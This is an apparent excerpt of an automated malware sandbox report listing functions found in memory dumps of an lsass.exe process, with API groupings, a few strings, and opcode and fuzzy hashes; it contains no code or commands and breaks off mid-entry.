                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModule
                                                                    • String ID: wr
                                                                    • API String ID: 1092925422-2678910430
                                                                    • Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction ID: 56a1fc91981ff5b9860e83c331195b973d21dc503a25c2b603b9cee17e6af388
                                                                    • Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
                                                                    • Instruction Fuzzy Hash: FD1157AA705B81CAEF559F21F41C66962B0FB88BD5F44042ADE8E07B94EF3DCA05C704
                                                                    Function 000002D6F1515B30 Relevance: 9.2, APIs: 6, Instructions: 240threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Thread$Current$Context
                                                                    • String ID:
                                                                    • API String ID: 1666949209-0
                                                                    • Opcode ID: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                    • Instruction ID: 48f46886f9a4c9f0af87d4b559936913019cc1f1eed6d2fcc966534f28762692
                                                                    • Opcode Fuzzy Hash: 542e600666cb1ac52823d1f72aa5ca11f47e3ee1f4dc73a6c07a176fbafbfe1c
                                                                    • Instruction Fuzzy Hash: 76D187B6214F8889DA719F1AF49835A77A0F389BC4F104216EA8E57BA5DF7CC941CF40
                                                                    Function 000002D6F1512F04 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 93memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$AllocFree
                                                                    • String ID: dialer
                                                                    • API String ID: 756756679-3528709123
                                                                    • Opcode ID: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction ID: 6f7c6b014d4bd7126e3bbbff313cacc6244a2be32cd63f79b011c0dee58239f0
                                                                    • Opcode Fuzzy Hash: 2e24de9146afbba5105044d4fd5602f1f9f0ed558a5ed62472976580c3eaf0ad
                                                                    • Instruction Fuzzy Hash: F631CDA2301F918AEB56CF16F54C72A67A0FB44BC0F1880269E4E57F55EF3CD8A18300
                                                                    Function 000002D6F15114A4 Relevance: 9.1, APIs: 5, Strings: 1, Instructions: 70memoryCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Heap$Process$Free
                                                                    • String ID: C:\Windows\system32\lsass.exe
                                                                    • API String ID: 3168794593-3553486595
                                                                    • Opcode ID: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                    • Instruction ID: 4c3fb5dbda590ede340f70e239d951b1946e93fc28bd49ed613bd9f4bb13803d
                                                                    • Opcode Fuzzy Hash: 335002606d0c58216c4b7b8c214cf2e956f7ef49abbb5e195d674a66fc258290
                                                                    • Instruction Fuzzy Hash: 77219EEB509ED08EF651DF25B89D29D27A0F749BC4F194017DF4E93A43DA2DAC048700
                                                                    Function 000002D6F151CFA0 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Value$ErrorLast
                                                                    • String ID:
                                                                    • API String ID: 2506987500-0
                                                                    • Opcode ID: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction ID: 64ae360e53322a3fe6ae1786423e02a03aa622958712b9455162e794dcab319a
                                                                    • Opcode Fuzzy Hash: 4f148fb448054b99fdb5313590ff83f86fc6d8762bc770a772f95ba4b575ef67
                                                                    • Instruction Fuzzy Hash: 931157E0301E804AFA6A9F35765D73952529B447F0F144717983F67FD6DE6DCC428600
                                                                    Function 000002D6F151199C Relevance: 9.0, APIs: 6, Instructions: 42stringCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
                                                                    • String ID:
                                                                    • API String ID: 517849248-0
                                                                    • Opcode ID: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction ID: cff459d1bd899cdfd44676a5a381a09abba527aeb6cc39614b6ef60cc1fcaaaf
                                                                    • Opcode Fuzzy Hash: 01214db588610ff501214a343c1506f8e4016efad0e64bbd234dc336c45f59d3
                                                                    • Instruction Fuzzy Hash: 070129B2300E808AEB54DB62B89C75967A5F788BC4F984036DE4E53B55DF3CC989C740
                                                                    Function 000002D6F15136C8 Relevance: 9.0, APIs: 6, Instructions: 38threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
                                                                    • String ID:
                                                                    • API String ID: 449555515-0
                                                                    • Opcode ID: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction ID: 4cb24c3c5e9fa141b5df1c6a7c4a8c5dc67f34b77b6b13790439d7932f787d30
                                                                    • Opcode Fuzzy Hash: 4c9ec6165d8c5af47ee19c29b3e549fd6cc17b885c385019f049dc0dac4977bc
                                                                    • Instruction Fuzzy Hash: 320129A6611F808AFF659B22F81C71963B0BB49BC6F04042ACE4E07B64EF3DC919C704
                                                                    Function 000002D6F1518FE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritableUnwind__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 2395640692-629598281
                                                                    • Opcode ID: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                    • Instruction ID: 3b0e631b75504db4463a701d796cd14c903cf2e77cba2ed9bb482b335b50820a
                                                                    • Opcode Fuzzy Hash: 255e8a15c903f04b3fededc0bb6945c1536f1eb34c4f108c78a5ad073a1a53ec
                                                                    • Instruction Fuzzy Hash: 7C518AB2601A408EEB16DF15F85CB5937A6F384BC8F55852ADE0B67B88DB39DD81C700
                                                                    Function 000002D6F1513044 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CombinePath
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3422762182-91387939
                                                                    • Opcode ID: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction ID: 3e4723502f59a8f1e07ded70428830228723a6d762285bf7447ffc8a7d9f86c1
                                                                    • Opcode Fuzzy Hash: 8c685e1f0b85bfe06f91eeefbd03c12bff8419d51c8b157116edbf6ca1c9c829
                                                                    • Instruction Fuzzy Hash: 16F01CA6714FC486EA548F57B91C11966A1BB58FE0F089132EE4F57F18DF3CC8558700
                                                                    Function 000002D6F151BC98 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: AddressFreeHandleLibraryModuleProc
                                                                    • String ID: CorExitProcess$mscoree.dll
                                                                    • API String ID: 4061214504-1276376045
                                                                    • Opcode ID: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction ID: 23a4a7cfba681eafd7acd153de910ccfab7048bd4207ecad1fa1577b34c1d807
                                                                    • Opcode Fuzzy Hash: 0f45d19500fbd6816ab24c8a126c5dacde8056cea587c59ff890217df17fdf5d
                                                                    • Instruction Fuzzy Hash: 55F06DA2211E8585EB248F24F84C3696330EB99BE5F94121ACE6F46AE4CF2CC9488340
                                                                    Function 000002D6F15150D0 Relevance: 7.8, APIs: 5, Instructions: 318threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                    • Instruction ID: 42075970a9a9322463efdc1a56445cb29a1d8840ca77651260a4224c7a6fbde6
                                                                    • Opcode Fuzzy Hash: e13ad259af2044a9722e5c88be2fea28068701e2040856c8b7ebe2328a6e9181
                                                                    • Instruction Fuzzy Hash: 7302B576219B848AEB61CF55F49835AB7A1F3857D4F100016EA8E97BA9DB7CC884CF00
                                                                    Function 000002D6F1515710 Relevance: 7.6, APIs: 5, Instructions: 124threadCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentThread
                                                                    • String ID:
                                                                    • API String ID: 2882836952-0
                                                                    • Opcode ID: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                    • Instruction ID: 3ee684a2051b0626537bb21df19f72d7656a23c79b275dde9432cc418d5cd82d
                                                                    • Opcode Fuzzy Hash: b02f694671304b5a077fe24bce3094f0c3b02718cee177a37b7a7da192a85efa
                                                                    • Instruction Fuzzy Hash: 4461B2B6529E84CAEA618F15F49D31AB7A1F3897C4F100116EA8E57FA8DB7CC841CF40
                                                                    Function 000002D6F1524104 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: 424267331a93190a57d2639305031bc8998964835541697d1ff8627115ec689c
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: E11173A7B10FD119F7641768F45D36621416F783F8F280626EA7F17ED6CA6CCC418200
                                                                    Function 000002D6F14F3504 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: _set_statfp
                                                                    • String ID:
                                                                    • API String ID: 1156100317-0
                                                                    • Opcode ID: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction ID: ba703c9331ee713b56c495894a3d73b0a2062aaebb232e8d6e30e25fb009abb4
                                                                    • Opcode Fuzzy Hash: 9af7c444609857cffc651de9bcb8f693be62289a5d0e310862a2fbcb97617874
                                                                    • Instruction Fuzzy Hash: 12117323A14E5119FBA41769F45D36911816BD93F4F889A3AAA770FFDECA2CCC45C110
                                                                    Function 000002D6F14EF040 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 182COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: _invalid_parameter_noinfo
                                                                    • String ID: Tuesday$Wednesday$or copy constructor iterator'
                                                                    • API String ID: 3215553584-4202648911
                                                                    • Opcode ID: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction ID: e6160abfd5a2cc9cf80f440168c8954cb50692cc9a53660c5a43eaca46e9ff2f
                                                                    • Opcode Fuzzy Hash: 9e57f18f61c22f0406784eb273be7b0d6046b42052b72e443b30de0c50228f55
                                                                    • Instruction Fuzzy Hash: C3619C72601E448AFA6DCB69F54C32AAAA1A7C67C0F55451BCA0B07FECDB3DCE458301
                                                                    Function 000002D6F151AA1C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CallEncodePointerTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3544855599-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: 1d7432d42cb839326b1ec519d8e3b4db095f3ae002e7f932d77f27b7b20c2c01
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 556158B7600B848AEB22DFA5E44879D77A0F344BDCF044616EE4E27B98DB78C995C700
                                                                    Function 000002D6F151AD78 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: a1fa52ff5b8a92164aef8a90dc21d442fce71749ed4764205dc9c63b39132c2b
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 72517CB6100AC08EEB668FA5A48C35977A0F354BD9F144217DA9EA7FD5CB3CD891C701
                                                                    Function 000002D6F14EA178 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 145COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3896166516-3733052814
                                                                    • Opcode ID: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction ID: cfee3a79a6332420dfddfd621a8844a6e200f43d99eb8e2e0c62dd5cb1a16251
                                                                    • Opcode Fuzzy Hash: b607b9418e38c48ebb6f53552568b8ff7a3aff5a85fd43f0b6d07fa9fad214e5
                                                                    • Instruction Fuzzy Hash: 89517C32100A80CEEB64CB25A54C35877A1F795BD4F288217DA9A87FD9CB7CDA90CB11
                                                                    Function 000002D6F14E8405 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 135COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction ID: 972f85bd260c2ee75a15eccb82eca9add97efd3e6d8f92d2c71b54b9a0724d42
                                                                    • Opcode Fuzzy Hash: 114af5d7cf0438a1297bb8b9b6869ba79c6078414514cf9bb502ab9f42d0baed
                                                                    • Instruction Fuzzy Hash: 07518832601A028EEF64CB16F44CB1937A5F3D4BD8F558526DA1747B8CEB39DE418B04
                                                                    Function 000002D6F14E83E8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 75COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentImageNonwritable__except_validate_context_record
                                                                    • String ID: csm$f
                                                                    • API String ID: 3242871069-629598281
                                                                    • Opcode ID: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction ID: fac092133bcf5273d306a1bfba47854e7a8849c5731493164c1dc531c6143850
                                                                    • Opcode Fuzzy Hash: 0036035fc280b7a5a111a049c7edfc77b7be6b9ab52e14187ebc45e366edaa55
                                                                    • Instruction Fuzzy Hash: D6314672601A419AEB14DF12F84CB5977A4F780BD8F15852AAE6B07B8CDB3CCE41CB04
                                                                    Function 000002D6F1522058 Relevance: 6.3, APIs: 4, Instructions: 299fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: FileWrite$ConsoleErrorLastOutput
                                                                    • String ID:
                                                                    • API String ID: 2718003287-0
                                                                    • Opcode ID: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction ID: 46840878b0cc5d224b34d7d0e9dac87f5955736167c6a31398be0b02f4667bf4
                                                                    • Opcode Fuzzy Hash: 3a35214534a53fd0655822596b90f4932f5655332a96a267e8fac8abb8670521
                                                                    • Instruction Fuzzy Hash: CED1BFB7714A808DE711CFA9E44829C3BB1F7547D8F14421ADE5E9BF99DA38C906C780
                                                                    Function 000002D6F1522980 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: ConsoleErrorLastMode
                                                                    • String ID:
                                                                    • API String ID: 953036326-0
                                                                    • Opcode ID: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction ID: c9214aef26bfacb35296ae088b721dff4a15a35e123c9ee8ba9635ca1e8333b4
                                                                    • Opcode Fuzzy Hash: fa691138abb93940963a85324df6708f2ee223ec670a65e1a7af20f8b77031a4
                                                                    • Instruction Fuzzy Hash: 5A9177A7700E909DFB649F65A48C3AD2BA0A754BC8F54410EDE4F67E95DB78C882C700
                                                                    Function 000002D6F1517960 Relevance: 6.0, APIs: 4, Instructions: 39timethreadCOMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                    • String ID:
                                                                    • API String ID: 2933794660-0
                                                                    • Opcode ID: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction ID: 46c5aac05c874f4bb09711078cff6ceae9bbf1676f6b8508b6834c3418bbca38
                                                                    • Opcode Fuzzy Hash: 561ac6f4885ef0f33bff27beb4ddb95e6a253367b5c72fac45fcb4617ca9122b
                                                                    • Instruction Fuzzy Hash: 30111C66710F418AEF008F60E8993A833A4F719798F440E22DE6E46BA4DB7CD5998380
                                                                    Function 000002D6F14E9E1C Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 147COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f14e0000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: CallTranslator
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 3163161869-2084237596
                                                                    • Opcode ID: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction ID: d070504b4f6ab16698584910d28eb8b80bc01e4cc0e3f10349b5f2c037af8c0d
                                                                    • Opcode Fuzzy Hash: c123fbbb8780cd52d1c7b069b1b1cc678e7e4f5673d54000f6e5fbfac7098139
                                                                    • Instruction Fuzzy Hash: 6E616B73600F848AEB20DF65E4583AD7BA0F784BD8F144216EF4A57B99DB38DA95C700
                                                                    Function 000002D6F1512330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 141COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: FileType
                                                                    • String ID: \\.\pipe\
                                                                    • API String ID: 3081899298-91387939
                                                                    • Opcode ID: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction ID: 394cc914bfb9ce43346b5ff93633d9b94699b0b3b218dfcc43da45d9579c068f
                                                                    • Opcode Fuzzy Hash: 713d5f66120afee1318357aa22047e1871f046a8e1f6ca4f8182a23e28854f89
                                                                    • Instruction Fuzzy Hash: 1951F5B2204B8189E6769F2AB09C3AA6BA1F3857C0F65412BDD4F27F49DA7DCD04C740
                                                                    Function 000002D6F15226F0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100fileCOMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: ErrorFileLastWrite
                                                                    • String ID: U
                                                                    • API String ID: 442123175-4171548499
                                                                    • Opcode ID: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction ID: 824dda5bf0e141a0eccdff39b2f392aa61083a03da449fe0be0865378a6b09d5
                                                                    • Opcode Fuzzy Hash: 769e155e8e03be1ef4aeb5f55e8b8ada6faf705201daec98c5fb8cb61498ce5a
                                                                    • Instruction Fuzzy Hash: 75419FB3314B808ADB208F25F84C3A9A7A1F7987D4F444126EE4E87B94EB7CC841CB40
                                                                    Function 000002D6F15194A0 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440588007.000002D6F1510000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F1510000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_62_2_2d6f1510000_lsass.jbxd
                                                                    Similarity
                                                                    • API ID: ExceptionFileHeaderRaise
                                                                    • String ID: csm
                                                                    • API String ID: 2573137834-1018135373
                                                                    • Opcode ID: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction ID: 0179ef454bca868754a89d0f14593ff5d1bafe773b9c0e76b87cdcda21dd5abb
                                                                    • Opcode Fuzzy Hash: 596d8aa0106168f831d5a6617a756b303fb26e5894bac8705379b132699e985d
                                                                    • Instruction Fuzzy Hash: C6113A76214F8086EB618F15F458359B7E5FB88B98F594222EE8E17B68DF3CC951CB00
                                                                    Function 000002D6F14E7356 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 18COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 0000003E.00000002.3440487740.000002D6F14E0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002D6F14E0000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
